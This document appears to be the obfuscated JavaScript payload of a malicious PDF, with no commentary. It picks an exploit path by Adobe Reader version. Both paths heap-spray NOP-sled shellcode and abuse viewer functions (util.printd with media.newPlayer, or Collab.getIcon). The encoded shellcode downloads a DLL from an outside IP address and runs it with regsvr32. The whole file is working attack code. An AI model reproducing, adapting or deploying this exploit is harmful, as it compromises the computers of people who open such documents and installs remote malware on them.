var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('



');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}